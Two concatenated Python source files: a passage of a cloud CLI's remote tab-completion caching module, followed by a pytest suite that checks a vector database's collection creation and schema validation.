'compute.regions': ' --region ',
'compute.zones': ' --zone ',
'sql.projects': ' --project '
}
_OPTIONAL_PARMS = {
'compute': [
{'project': lambda parsed_args: parsed_args.project},
{'region': lambda parsed_args: parsed_args.region},
{'zone': lambda parsed_args: parsed_args.zone},
],
'sql': [
{'instance': lambda parsed_args: parsed_args.instance},
{'project': lambda parsed_args: parsed_args.project},
],
}
class CompletionProgressTracker(object):
"""A context manager for telling the user about long-running completions."""
SPIN_MARKS = [
'|',
'/',
'-',
'\\',
]
def __init__(self, ofile, timeout=3.0, autotick=True):
self._ticks = 0
self._autotick = autotick
self._done = False
self._lock = threading.Lock()
self.ofile = ofile
self.timeout = timeout
self.has_forked = False # set when a child process is created
def __enter__(self):
if self._autotick:
def Ticker():
time.sleep(.2)
self.timeout -= .2
while True:
if self.timeout < 0:
self.ofile.write('?\b')
self.ofile.flush()
os.fork()
# the next line indicates that the tracker has forked() the process
self.has_forked = True
return
time.sleep(.1)
self.timeout -= .1
if self.Tick():
return
threading.Thread(target=Ticker).start()
return self
def Tick(self):
"""Give a visual indication to the user that some progress has been made."""
with self._lock:
if not self._done:
self._ticks += 1
self.ofile.write(
CompletionProgressTracker.SPIN_MARKS[
self._ticks % len(CompletionProgressTracker.SPIN_MARKS)] + '\b')
self.ofile.flush()
return self._done
def __exit__(self, unused_type=None, unused_value=True,
unused_traceback=None):
with self._lock:
self.ofile.write(' \b')
self._done = True
def Iterate(obj, resource_refs, fun):
if platforms.OperatingSystem.Current() == platforms.OperatingSystem.WINDOWS:
return obj
return Iter(iter(obj), resource_refs, fun)
class Iter(object):
"""Create an iterator that extracts the names of objects.
Args:
items: List of items to iterate
resource_refs: List of resource_refs created by iterator.
"""
def __init__(self, items, resource_refs, fun):
self.items = items
self.resource_refs = resource_refs
self.fun = fun
def next(self):
"""Returns next item in list.
Returns:
Next Item in the list.
"""
item = self.items.next()
ref = self.fun(item)
self.resource_refs.append(ref)
return item
def __iter__(self):
return self
class _UpdateCacheOp(object):
"""The cache update operation base class."""
__metaclass__ = abc.ABCMeta
@staticmethod
@abc.abstractmethod
def UpdateCache(completer, uris):
"""Updates the completer cache with uris."""
pass
class AddToCacheOp(_UpdateCacheOp):
"""An AddToCache operation."""
__metaclass__ = abc.ABCMeta
@staticmethod
def UpdateCache(completer, uris):
"""Updates the completer cache with uris."""
for uri in uris:
completer.AddToCache(uri)
class DeleteFromCacheOp(_UpdateCacheOp):
"""An DeleteFromCache operation."""
__metaclass__ = abc.ABCMeta
@staticmethod
def UpdateCache(completer, uris):
"""Updates the completer cache with uris."""
for uri in uris:
completer.DeleteFromCache(uri)
class ReplaceCacheOp(_UpdateCacheOp):
"""An ReplaceCache operation."""
__metaclass__ = abc.ABCMeta
@staticmethod
def UpdateCache(completer, uris):
"""Updates the completer cache with uris."""
completer.StoreInCache(uris)
class RemoteCompletion(object):
"""Class to cache the names of remote resources."""
CACHE_HITS = 0
CACHE_TRIES = 0
_TIMEOUTS = { # Timeouts for resources in seconds
'sql.instances': 600,
'compute.instances': 600,
'compute.regions': 3600*10,
'compute.zones': 3600*10
}
ITEM_NAME_FUN = {
'compute': lambda item: item['name'],
'sql': lambda item: item.instance
}
@staticmethod
def CacheHits():
return RemoteCompletion.CACHE_HITS
@staticmethod
def CacheTries():
return RemoteCompletion.CACHE_TRIES
@staticmethod
def CachePath(self_link):
"""Returns cache path corresponding to self_link.
Args:
self_link: A resource selflink.
Returns:
A file path for storing resource names.
"""
ref = self_link.replace('https://', '')
lst = ref.split('/')
name = lst[-1]
lst[-1] = '_names_'
return [os.path.join(*lst), name]
@staticmethod
def ResetCache():
cache_dir = config.Paths().completion_cache_dir
if os.path.isdir(cache_dir):
files.RmTree(cache_dir)
def __init__(self):
"""Set the cache directory."""
try:
self.project = properties.VALUES.core.project.Get(required=True)
except Exception: # pylint:disable=broad-except
self.project = 0
self.cache_dir = config.Paths().completion_cache_dir
self.flags = ''
self.index_offset = 0
self.account = properties.VALUES.core.account.Get(required=False)
if self.account:
self.index_offset = 1
self.cache_dir = os.path.join(self.cache_dir, self.account)
def ResourceIsCached(self, resource):
"""Returns True for resources that can be cached.
Args:
resource: The resource as subcommand.resource.
Returns:
True when resource is cacheable.
"""
if resource == 'sql.instances':
return True
if resource.startswith('compute.'):
return True
return False
def GetFromCache(self, self_link, prefix, increment_counters=True):
"""Return a list of names for the specified self_link.
Args:
self_link: A selflink for the desired resource.
prefix: completion word prefix
increment_counters: If True and found in cache, CACHE_TRIES is
incremented.
Returns:
Returns a list of names if in the cache.
"""
options = None
if increment_counters:
RemoteCompletion.CACHE_TRIES += 1
path = RemoteCompletion.CachePath(self_link)[0]
fpath = os.path.join(self.cache_dir, path)
return self._GetAllMatchesFromCache(prefix, fpath, options,
increment_counters)
def _GetAllMatchesFromCache(self, prefix, fpath, options, increment_counters):
"""Return a list of names matching fpath.
Args:
prefix: completion word prefix
fpath: A selflink for the desired resource.
options: list of names in the cache.
increment_counters: If True and found in cache, CACHE_HITS is incremented.
Returns:
Returns a list of names if in the cache.
"""
lst = fpath.split('*')
items = lst[0].split('/')
if len(lst) > 1:
# A resource flag such as --zone or --region is not specified so
# look at all resources with that type
if not os.path.isdir(lst[0]):
return None
index = items.index('completion_cache') + self.index_offset
if index < 0 or index >= len(items):
return options
flagname = _RESOURCE_FLAGS[items[index+2] + '.' + items[-2]]
for name in os.listdir(lst[0]):
self.flags = flagname + name
fpath = lst[0] + name + lst[1]
# make sure that the data in this path is still valid
if os.path.isfile(fpath) and os.path.getmtime(fpath) > time.time():
options = self._GetAllMatchesFromCache(prefix, fpath, options,
increment_counters)
else:
# if not valid then the cache can't be used so return no matches
if os.path.isdir(os.path.dirname(fpath)) and os.path.getsize(fpath):
return None
# for regional resources also check for global resources
lst0 = lst[0]
if lst0.endswith('regions/'):
fpath = lst0[:-len('regions/')] + 'global' + lst[1]
if os.path.isfile(fpath) and os.path.getmtime(fpath) > time.time():
self.flags = ' --global'
options = self._GetAllMatchesFromCache(prefix, fpath, options,
increment_counters)
return options
if not fpath:
return None
try:
# The zone or region is specified so use it if it hasn't timed out
if not os.path.isfile(fpath) or os.path.getmtime(fpath) <= time.time():
return None
with open(fpath, 'r') as f:
data = f.read()
if not options:
options = []
for item in data.split('\n'):
if not prefix or item.startswith(prefix):
options.append(item + self.flags)
self.flags = ''
if increment_counters:
RemoteCompletion.CACHE_HITS += 1
return options
except IOError:
return None
def StoreInCache(self, self_links):
"""Store names of resources listed in cache.
Args:
self_links: A list of resource instance references
Returns:
None
"""
if platforms.OperatingSystem.Current() == platforms.OperatingSystem.WINDOWS:
return None
paths = {}
collection = None
for ref in self_links:
if not collection:
try:
instance_ref = resources.Parse(ref)
collection = instance_ref.Collection()
except resources.InvalidResourceException:
# construct collection from self link
lst = ref.split('/')
collection = lst[3] + '.' + lst[-2]
lst = RemoteCompletion.CachePath(ref)
path = lst[0]
name = lst[1]
if path in paths:
paths[path].append(name)
else:
paths[path] = [name]
if not collection:
return
for path in paths:
abs_path = os.path.join(self.cache_dir, path)
dirname = os.path.dirname(abs_path)
try:
if not os.path.isdir(dirname):
files.MakeDir(dirname)
tempname = tempfile.NamedTemporaryFile(dir=dirname).name
with open(tempname, 'w') as f:
f.write('\n'.join(paths[path]))
# note that atomic rename does't work on windows
os.rename(tempname, abs_path)
now = time.time()
timeout = RemoteCompletion._TIMEOUTS.get(collection, 300)
os.utime(abs_path, (now, now+timeout))
except Exception: # pylint: disable=broad-except
return
def AddToCache(self, self_link, delete=False):
"""Add the specified instance to the cache.
Args:
self_link: A resource selflink.
delete: Delete the resource from the cache
Returns:
None
"""
lst = RemoteCompletion.CachePath(self_link)
path = lst[0]
name = lst[1]
abs_path = os.path.join(self.cache_dir, path)
try:
# save the current modification time on the cache file
mtime = os.path.getmtime(abs_path)
with open(abs_path, 'r') as f:
data = f.read()
options = data.split('\n')
if delete:
options.remove(name)
if not options:
os.remove(abs_path)
return
else:
options.append(name)
with open(abs_path, 'w') as f:
f.write('\n'.join(options))
os.utime(abs_path, (time.time(), mtime))
# restore the current modification time on the cache file
except OSError:
if delete:
return
self.StoreInCache([self_link])
except ValueError:
if delete:
return
def DeleteFromCache(self, self_link):
"""Delete the specified instance from the cache.
Args:
self_link: A resource selflink.
Returns:
None
"""
self.AddToCache(self_link, delete=True)
def UpdateCache(self, operation, uris):
"""Updates the cache using operation on uris.
Args:
operation: AddToCacheOp, DeleteFromCacheOp, or ReplaceCacheOp.
uris: The list of uris for the operation.
Raises:
InternalError: if operation is invalid.
"""
if operation not in (AddToCacheOp, DeleteFromCacheOp, ReplaceCacheOp):
raise exceptions.InternalError(
'RemoteCompletion.UpdateCache operation [{0}] must be an '
'_UpdateCacheOp.'.format(operation))
operation().UpdateCache(self, uris)
@staticmethod
def GetTickerStream():
return os.fdopen(9, 'w')
@staticmethod
def RunListCommand(cli, command, parse_output=False,
list_command_updates_cache=False):
"""Runs a cli list comman with a visual progress tracker/spinner.
Args:
cli: The calliope cli object.
command: The list command that generates the completion data.
parse_output: If True then the output of command is read and split into a
resource data list, one item per line. If False then the command return
value is the resource data list.
list_command_updates_cache: True if running the list command updates the
cache.
Returns:
The resource data list.
"""
pid = os.getpid()
ofile = RemoteCompletion.GetTickerStream()
tracker = CompletionProgressTracker(ofile)
if parse_output:
log_out = log.out
out = StringIO.StringIO()
log.out = out
elif list_command_updates_cache:
command.append('--format=none')
else:
command.append('--format=none[disable]')
with tracker:
items = cli().Execute(command, call_arg_complete=False)
if parse_output:
log.out = log_out
if tracker.has_forked:
# The tracker has forked,
if os.getpid() == pid:
# This is the parent.
return []
# The parent already exited, so exit the child.
os.exit(0)
if parse_output:
return out.getvalue().rstrip('\n').split('\n')
return list(items)
@staticmethod
def GetCompleterForResource(resource, cli, command_line=None,
list_command_callback_fn=None):
"""Returns a completer function for the given resource.
Args:
resource: The resource as subcommand.resource.
cli: The calliope instance.
command_line: str, The gcloud list command to run.
list_command_callback_fn: function, Callback function to be run to produce
the gcloud list command to run. Takes precedence over command_line.
Returns:
A completer function for the specified resource.
"""
if platforms.OperatingSystem.Current() == platforms.OperatingSystem.WINDOWS:
return None
def RemoteCompleter(parsed_args, **unused_kwargs):
"""Runs list command on resource to generate completion data."""
list_command_updates_cache = False
info = resource_registry.Get(resource)
if info.cache_command:
command = info.cache_command.split(' ')
list_command_updates_cache = True
elif list_command_callback_fn:
command = list_command_callback_fn(parsed_args)
elif command_line:
command = command_line.split('.') + ['list']
else:
command = resource.split('.') + ['list']
if info.bypass_cache:
# Don't cache - use the cache_command results directly.
return RemoteCompletion.RunListCommand(
cli, command, parse_output=True)
options = []
try:
line = os.getenv('COMP_LINE')
prefix = ''
if line:
for i in range(len(line)-1, -1, -1):
c = line[i]
if c == ' ' or c == '\t':
break
prefix = c + prefix
project = properties.VALUES.core.project.Get(required=True)
parms = {}
if command[0] in _OPTIONAL_PARMS:
for arg in _OPTIONAL_PARMS[command[0]]:
for attrib in dict(arg):
if hasattr(parsed_args, attrib):
fun = arg[attrib]
value = fun(parsed_args)
if value:
parms[attrib] = value
command.append('--' + attrib)
command.append(value)
parms['project'] = project
resource_link = resources.Parse('+', parms, resource, resolve=False)
resource_link = resource_link.WeakSelfLink()
lst = resource_link.split('*')
resource_missing = len(lst) > 1
ccache = RemoteCompletion()
options = ccache.GetFromCache(resource_link, prefix)
if options is not None:
return options
items = RemoteCompletion.RunListCommand(
cli, command, list_command_updates_cache=list_command_updates_cache)
if list_command_updates_cache:
options = ccache.GetFromCache(resource_link, prefix) or []
if options:
RemoteCompletion.CACHE_HITS -= 1
return options
# This part can be dropped when all commands are subclassed.
options = []
self_links = []
for item in items:
# Get a selflink for the item
if command[0] == 'compute':
if 'selfLink' in item:
instance_ref = resources.Parse(item['selfLink'])
selflink = instance_ref.SelfLink()
elif resource_link:
selflink = resource_link.rstrip('+') + item['name']
else:
instance_ref = resources.Create(resource, project=item.project,
instance=item.instance)
selflink = instance_ref.SelfLink()
self_links.append(selflink)
lst = selflink.split('/')
name = lst[-1]
if not prefix or name.startswith(prefix):
options.append(name)
if self_links:
ccache.StoreInCache(self_links)
if resource_missing:
options = ccache.GetFromCache(resource_link, prefix,
increment_counters=False) or []
except Exception: # pylint:disable=broad-except
log.error(resource + 'completion command failed', exc_info=True)
return []
return options
return RemoteCompleter
|
test_collection.py
|
import numpy
import pandas as pd
import pytest
from pymilvus import DataType
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common import constants as cons
prefix = "collection"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
uid_count = "collection_count"
tag = "collection_count_tag"
uid_stats = "get_collection_stats"
uid_create = "create_collection"
uid_describe = "describe_collection"
uid_drop = "drop_collection"
uid_has = "has_collection"
uid_list = "list_collections"
uid_load = "load_collection"
field_name = default_float_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": default_top_k, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
class TestCollectionParams(TestcaseBase):
""" Test case of collection interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_none_removed_invalid_strings(self, request):
if request.param is None:
pytest.skip("None schema is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_type_fields(self, request):
if isinstance(request.param, list):
pytest.skip("list is valid fields")
yield request.param
@pytest.fixture(scope="function", params=cf.gen_all_type_fields())
def get_unsupported_primary_field(self, request):
if request.param.dtype == DataType.INT64:
pytest.skip("int64 type is valid primary key")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_dim(self, request):
if request.param == 1:
pytest.skip("1 is valid dim")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection(self):
"""
target: test collection with default schema
method: create collection with default schema
expected: assert collection property
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema, exp_num: 0,
exp_primary: ct.default_int64_field_name})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_empty_name(self):
"""
target: test collection with empty name
method: create collection with a empty name
expected: raise exception
"""
self._connect()
c_name = ""
error = {ct.err_code: 1, ct.err_msg: f'`collection_name` value is illegal'}
self.collection_wrap.init_collection(c_name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
@pytest.mark.parametrize("name", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_illegal_name(self, name):
"""
target: test collection with illegal name
method: create collection with illegal name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "`collection_name` value {} is illegal".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_name(self, name):
"""
target: test collection with invalid name
method: create collection with invalid name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_dup_name(self):
"""
target: test collection with dup name
method: create collection with dup name and none schema and data
expected: collection properties consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(collection_w.name)
assert collection_w.name == self.collection_wrap.name
assert collection_w.schema == self.collection_wrap.schema
assert collection_w.num_entities == self.collection_wrap.num_entities
assert collection_w.name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_with_desc(self):
"""
target: test collection with dup name
method: 1. default schema with desc 2. dup name collection
expected: desc consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
self.collection_wrap.init_collection(c_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
assert collection_w.description == self.collection_wrap.description
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_schema(self):
"""
target: test collection with dup name and new schema
method: 1.create collection with default schema
2. collection with dup name and new schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
fields = [cf.gen_int64_field(is_primary=True)]
schema = cf.gen_collection_schema(fields=fields)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_primary(self):
"""
target: test collection with dup name and new primary_field schema
method: 1.collection with default schema
2. collection with same fields and new primary_field schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field()
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema = cf.gen_collection_schema(fields, primary_field=int_field_one.name)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema,
exp_primary: int_field_one.name})
new_schema = cf.gen_collection_schema(fields, primary_field=int_field_two.name)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=new_schema, check_task=CheckTasks.err_res,
check_items=error)
assert collection_w.primary_field.name == int_field_one.name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_dim(self):
"""
target: test collection with dup name and new dim schema
method: 1. default schema 2. schema with new dim
expected: raise exception
"""
self._connect()
new_dim = 120
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
schema = cf.gen_default_collection_schema()
new_fields = cf.gen_float_vec_field(dim=new_dim)
schema.fields[-1] = new_fields
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
dim = collection_w.schema.fields[-1].params['dim']
assert dim == ct.default_dim
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_invalid_schema_type(self, get_none_removed_invalid_strings):
"""
target: test collection with dup name and invalid schema
method: 1. default schema 2. invalid schema
expected: raise exception and
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
schema = get_none_removed_invalid_strings
self.collection_wrap.init_collection(collection_w.name, schema=schema,
check_task=CheckTasks.err_res, check_items=error)
assert collection_w.name == c_name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_same_schema(self):
"""
target: test collection with dup name and same schema
method: dup name and same schema
expected: two collection object is available
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert collection_w.name == self.collection_wrap.name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_none_schema(self):
"""
target: test collection with none schema
method: create collection with none schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Should be passed into the schema"}
self.collection_wrap.init_collection(c_name, schema=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_invalid_type_schema(self, get_none_removed_invalid_strings):
"""
target: test collection with invalid schema
method: create collection with non-CollectionSchema type schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
self.collection_wrap.init_collection(c_name, schema=get_none_removed_invalid_strings,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_invalid_type_fields(self, get_invalid_type_fields):
"""
target: test collection with invalid fields type, non-list
method: create collection schema with non-list invalid fields
expected: exception
"""
self._connect()
fields = get_invalid_type_fields
error = {ct.err_code: 0, ct.err_msg: "The fields of schema must be type list"}
self.collection_schema_wrap.init_collection_schema(fields=fields,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_with_unknown_type(self):
"""
target: test collection with unknown type
method: create with DataType.UNKNOWN
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="unknown", dtype=DataType.UNKNOWN,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
@pytest.mark.parametrize("name", [[], 1, (1,), {1: 1}, "12-s"])
def test_collection_invalid_type_field(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=5, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_field_name(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_none_field_name(self):
"""
target: test field schema with None name
method: None field name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=None, dtype=DataType.INT64, is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "You should specify the name of field"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dtype", [6, [[]], {}, (), "", "a"])
def test_collection_invalid_field_type(self, dtype):
"""
target: test collection with invalid field type
method: invalid DataType
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="test", dtype=dtype, is_primary=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_field_dtype_float_value(self):
"""
target: test collection with float type
method: create field with float type
expected:
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=5.0,
is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 0, ct.err_msg: "Field type must be of DataType!"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_empty_fields(self):
"""
target: test collection with empty fields
method: create collection with fields = []
expected: exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=[], primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_field(self):
"""
target: test collection with dup field name
method: Two FieldSchema have same name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
schema = cf.gen_collection_schema(fields=[field_one, field_two, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "duplicated field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
assert not self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("field", [cf.gen_float_vec_field(), cf.gen_binary_vec_field()])
def test_collection_only_vector_field(self, field):
"""
target: test collection just with vec field
method: create with float-vec fields
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe"}
self.collection_schema_wrap.init_collection_schema([field], check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_float_vectors(self):
"""
target: test collection with multi float vectors
method: create collection with two float-vec fields
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_float_vec_field(name="tmp")]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_mix_vectors(self):
"""
target: test collection with mix vectors
method: create with float and binary vec
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_binary_vec_field()]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_without_vectors(self):
"""
target: test collection without vectors
method: create collection only with int field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
error = {ct.err_code: 0, ct.err_msg: "No vector field is found."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_primary_field(self):
"""
target: test collection without primary field
method: no primary field specified in collection schema and fields
expected: raise exception
"""
self._connect()
int_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64)
vec_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_float_vec_field_name,
dtype=DataType.FLOAT_VECTOR, dim=ct.default_dim)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema([int_fields, vec_fields],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_is_primary_false(self):
"""
target: test collection with all is_primary false
method: set all fields if_primary false
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=False), cf.gen_float_field(is_primary=False),
cf.gen_float_vec_field(is_primary=False)]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("is_primary", ct.get_invalid_strs)
def test_collection_invalid_is_primary(self, is_primary):
"""
target: test collection with invalid primary
method: define field with is_primary=non-bool
expected: raise exception
"""
self._connect()
name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Param is_primary must be bool type"}
self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=is_primary,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("primary_field", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_primary_field(self, primary_field):
"""
target: test collection with invalid primary_field
method: specify invalid string primary_field in collection schema
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("primary_field", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
